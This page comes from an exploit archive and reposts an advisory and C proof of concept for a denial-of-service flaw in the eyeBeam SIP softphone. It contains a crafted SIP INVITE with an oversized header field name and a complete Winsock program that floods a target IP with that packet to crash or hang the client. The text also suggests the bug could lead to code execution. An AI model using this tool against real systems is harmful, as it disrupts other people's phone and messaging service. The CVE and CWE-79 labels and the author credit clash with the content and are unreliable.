Advertisement
| CVE | Category | Price | Severity |
|---|---|---|---|
| CVE-2008-8008 | CWE-79 | $5000 | High |
| Author | Risk | Exploitation Type | Date |
|---|---|---|---|
| Sipera ViperLab | High | Remote | 2006-01-28 |
eyeBeam is a SIP softphone supporting open standards for VoIP, Video and Instant Messaging.
There is a vunerability in it while handing SIP header with a large field name like this:
INVITE sip:a (at) 127.0.0 (dot) 1 [email concealed] SIP/2.0
Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK00001249z9hG4bK.00004119
From: 1249 <sip:a (at) 127.0.0 (dot) 1 [email concealed]>;tag=1249
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Receiver <sip:100012 (at) 172.16.1 (dot) 1 [email concealed]>
Call-ID: 4166@<172.16.3.6> <--Change it to target IP
CSeq: 18571 INVITE
Expires: 1200
Max-Forwards: 70
Content-Type: application/sdp
Content-Length: 130
v=0
o=1249 1249 1249 IN IP4 127.0.0.1
s=Session SDP
c=IN IP4 127.0.0.1
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000
If you send the packet(several times) to eyeBeam when it's starting and have no call opreation,
then it will crashed for reading a unvalid address which we can control.
If you send it(several times) when it's in a call, then it will be unresponse(will not dial and receive any more) or crashed for writing a address(cannot control it now, but it's possible, and as I think, it can lead to execute code).
It looks like some memory operation error exists.
Addtion : the lastest version is affected.
====================eyeBeam_dos.c========================
/*********************************************************
eyeBeam handling SIP header DOS POC
Author : ZwelL
Email : zwell (at) sohu (dot) com [email concealed]
Blog : http://www.donews.net/zwell
Data : 2006.1.15
*********************************************************/
#include <stdio.h>
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
char *sendbuf1 =
"INVITE sip:a (at) 127.0.0 (dot) 1 [email concealed] SIP/2.0rn"
"Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK00001249z9hG4bK.00004119rn"
"From: test <sip:a (at) 127.0.0 (dot) 1 [email concealed]>;tag=1249rn"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaa: test <sip:a (at) 127.0.0 (dot) 1 [email concealed]>rn";
char *sendbuf2 =
"CSeq: 18571 INVITErn"
"Expires: 1200rn"
"Max-Forwards: 70rn"
"Content-Type: application/sdprn"
"Content-Length: 130rn"
"rn"
"v=0rn"
"o=1249 1249 1249 IN IP4 127.0.0.1rn"
"s=Session SDPrn"
"c=IN IP4 127.0.0.1rn"
"t=0 0rn"
"m=audio 9876 RTP/AVP 0rn"
"a=rtpmap:0 PCMU/8000rn";
int main(int argc, char **argv)
{
WSADATA wsaData;
SOCKET sock;
sockaddr_in RecvAddr;
char sendbuf[4096];
int iResult;
int port = 8376; //default is 8376, but SIP's default port is 5060
printf("eyeBeam handling SIP header DOS POCnAuthor : ZwelLn");
printf("Email : zwell (at) sohu (dot) com [email concealed]nBlog : http://www.donews.net/zwellnn");
if(argc < 2)
{
printf("Usage : %s <target ip> [port]n", argv[0]);
return 0;
}
if(argc == 3)
port = atoi(argv[2]);
iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
if (iResult != NO_ERROR)
{
printf("Error at WSAStartup()n");
return 0;
}
sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
ZeroMemory(&RecvAddr, sizeof(RecvAddr));
RecvAddr.sin_family = AF_INET;
RecvAddr.sin_port = htons((short)port);
RecvAddr.sin_addr.s_addr = inet_addr(argv[1]);
printf("Target is : %st port is : %drn", argv[1], port);
for(int i=0; i<20; i++)
{
sprintf(sendbuf, "%sCall-ID: 4166@<%s>rn%s", sendbuf1, argv[1], sendbuf2);
if(SOCKET_ERROR == sendto(sock,
sendbuf,
strlen(sendbuf),
0,
(SOCKADDR *) &RecvAddr,
sizeof(RecvAddr)))
{
printf("sendto wrong:%dn", WSAGetLastError());
continue;
}
}
printf("Now check the target is crafted?rn");
WSACleanup();
return 1;
}
Copyright ©2024 Exploitalert.